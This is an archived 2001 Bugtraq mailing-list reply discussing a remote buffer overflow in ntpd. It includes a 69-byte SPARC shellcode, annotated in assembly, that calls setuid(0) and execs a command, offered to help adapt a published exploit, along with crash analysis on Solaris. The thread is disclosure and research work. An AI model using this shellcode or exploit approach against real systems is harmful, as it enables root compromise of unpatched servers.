[20071] in bugtraq
Re: ntpd =< 4.0.99k remote buffer overflow
daemon@ATHENA.MIT.EDU (Alexander Gall)
Fri Apr 6 16:43:06 2001
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Message-ID: <E14lUOe-0002dF-00@central.switch.ch>
Date: Fri, 6 Apr 2001 13:27:20 +0200
Reply-To: Alexander Gall <gall@SWITCH.CH>
From: Alexander Gall <gall@SWITCH.CH>
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To: Your message of "Thu, 05 Apr 2001 15:30:42 BST."
<20010405153042.A3064@sherlock.clues.com>
> On Wed, Apr 04, 2001 at 06:49:01PM -0700, Crist Clark wrote:
> > Przemyslaw Frasunek wrote:
> > >
> > > /* ntpd remote root exploit / babcia padlina ltd. <venglin@freebsd.lublin.pl> */
> >
> > Not good. Not good. Verified the exploit worked on FreeBSD 4.2-STABLE with
> > the stock 4.0.99b. FreeBSD has a fix in CURRENT already.
> >
> > More sobering, blindly aiming the exploit code at a Sparc running xntpd 3.4y
> > caused it to seg. fault and core. No time to double-check if that is actually
> > exploitable at this moment. How many NTP distributions are based off of the
> > vulnerable code? With the small payload, gaining access might be hard, but
> > the potential for DoS looks pretty easy.
>
> We've taken a peek at getting sparc shellcode working with this. Getting
> it in below the 70 byte buffer size is tricky.
>
> Does anybody out there have working shellcode for this that can do *anything*
> to the state of the system even if it doesnt lead to full sploit? (beyond
> making ntp core of course ;) )
Well, here is a shellcode that is 69 bytes large and execs
'/bin/touch /tmp/test' as root (if called from a setuid root program)
char shellcode[]=
"\x90\x10\x20\x00" /* mov 0, %o0 */
"\x82\x10\x20\x17" /* mov 23, %g1 */
"\x91\xd0\x20\x08" /* ta 8 -> setuid(0) */
"\x30\x80\x00\x07" /* ba,a bounce */
"\x90\x03\xe0\x08" /* start: add %o7, 8, %o0 */
"\x92\x03\xa0\x40" /* add %sp, 64, %o1 */
"\xd0\x22\x40\x00" /* st %o0, [%o1] */
"\xc0\x22\x60\x04" /* st %g0, [%o1+4] */
"\x82\x10\x20\x0b" /* mov 11, %g1 */
"\x91\xd0\x20\x08" /* ta 8 -> exec() */
"\x7f\xff\xff\xfa" /* bounce: call start */
"\x01\x00\x00\x00" /* nop */
"/bin/touch /tmp/test";
I don't know if you are aware of this, but simply replacing the shellcode in
the exploit won't work because of the differing layout of a stack frame on
SPARC.
I have also verified that xntpd 3.4y crashes on Solaris 8 with SIGSEGV.
However, when I looked at the core dump I had the impression that this is
*not* due to a buffer overflow because I couldn't find any of the symptoms
that I would expect in such a case (jump to never-never land because the
overwritten return address on the stack is garbage, %l and %i registers
filled with data from the buffer). I didn't look too hard though, so I may
be wrong.
Alex.
___________ SWITCH - The Swiss Academic and Research Network ___________
Alexander Gall, SWITCH, Limmatquai 138, CH-8001 Zurich, Switzerland
gall@switch.ch Tel: +41 1 268 1522 Fax: +41 1 268 1568
